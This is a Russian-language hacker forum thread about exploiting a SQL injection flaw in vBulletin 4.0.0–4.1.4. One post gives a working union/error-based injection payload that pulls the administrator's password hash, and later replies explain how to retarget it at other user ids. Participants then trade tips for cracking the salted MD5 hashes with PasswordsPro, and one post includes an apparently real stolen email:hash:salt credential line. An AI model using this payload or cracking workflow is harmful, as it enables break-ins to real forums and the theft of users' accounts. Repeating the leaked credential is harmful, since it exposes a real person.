Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4

[4ipolino]

Уязвимость http://zhyk.ru/forum/showthread.php?t=272998
все вопросы задавать тут

[sunches]

humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=p rocess&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*

то что выделенно красным можно поменять на id другого юзера?

и еще такой вопрос,что если стоит антиспам бот к примеру такой (Проверка вопроса системы антиспама "NoSpam!")


s=&securitytoken=guest&do=process&searchthreadid=& query=32erddd&titleonly=0&searchuser=&starteronly= 0&exactname=1&humanverify%5Binput%5D=ktag2s&humanv erify%5Bhash%5D=7ee31ad89911458254ed1d2db6a21588&nospamnumber=0&nospam=********.net&replyless=0&replylimit=0&searchdate=0&beforeafter =after&sortby=lastpost&order=descending&showposts= 0&tag=&forumchoice%5B%5D=0&childforums=1&dosearch= %CD%E0%F7%E0%F2%FC+%EF%EE%E8%F1%EA

[Excellent18rus]

ID можно менять

для запроса нужен только securitytoken вроде бы

[DiagensR]

А где тип хеша md5(md5($pass)$salt) расшифровать? Подскажите.

[SyavaK]

Цитата: Сообщение от DiagensR А где тип хеша md5(md5($pass)$salt) расшифровать? Подскажите.

в програме PasswordsPro или Extreme GPU Bruteforcer

2 вопроса
как узнать логин юзера 1 ? ведь логин и никнейм не одно и тоже
в соли присудствует такое
<
&
"
>
прочитал в инете
одни пишут что нужно удалить lt; amp; quot; gt;
другие пишут что нужно заменить их на символы какими они и являются & - &, " - "
так как делать правильно ?

[DiagensR]

" это двойная ковычка вроде. Я думаю не стоит удалять, проще заменить.

[Excellent18rus]

я удалял, потому что иначе соль больше 30 символов

Логин и никнейм в булке одно и тоже... вроде бы
это в ИПБ вроде логин и ник разные

[SyavaK]

Цитата: Сообщение от Excellent18rus я удалял, потому что иначе соль больше 30 символов Логин и никнейм в булке одно и тоже... вроде бы :D это в ИПБ вроде логин и ник разные

и после удаления удалось розшифровать пароль ?

[DiagensR]

Ребят, еще вопрос, сколько по времени Passwords Pro расшифровывает это дело? У меня показывает что около двух дней будет копать....

[SyavaK]

Цитата: Сообщение от DiagensR Ребят, еще вопрос, сколько по времени Passwords Pro расшифровывает это дело? У меня показывает что около двух дней будет копать....

зависит от способа дешифровки, словари , брут и тд и ещё от длины пароля
может занять и месяцы )

ещё вопрос в соли попадается знак двоеточие это норм ?
ато пасвордпро его не щитает за часть соли а за разделитель

[DiagensR]

Можете кто нить дать нормальный словарь, а то я смотрю многие очень быстро расшифровывают кучу паролей сольных.

[SyavaK]

Цитата: Сообщение от Excellent18rus Логин и никнейм в булке одно и тоже... вроде бы :D это в ИПБ вроде логин и ник разные

токшо достал хеш и розшифровал его
присмотрелся к юзеру 1 а у него ник на русском ))
думаеш и логин тоже ? ))

[Excellent18rus]

не знаю даже
может и на русском логин)

да расшифровывал после убирания amp; итд

чтобы не показывало : как разделитель
загружай из буфера в виде акк:хеш:соль и все

[SyavaK]

Цитата: Сообщение от Excellent18rus чтобы не показывало : как разделитель загружай из буфера в виде акк:хеш:соль и все

так и загружаю
hwth@udm.ru:f5de53adcccdb58f51dd58e7972890d4:T9LW6)e:L&&5tQ?~ (gbcyKES_lS`EE
в пасворд про
hwth@udm.ru:f5de53adcccdb58f51dd58e7972890d4:T9LW6)e

[3a4eT]

Цитата: Сообщение от SyavaK так и загружаю hwth@udm.ru:f5de53adcccdb58f51dd58e7972890d4:T9LW6)e:L&&5tQ?~ (gbcyKES_lS`EE в пасворд про hwth@udm.ru:f5de53adcccdb58f51dd58e7972890d4:T9LW6)e

в ручную добавляй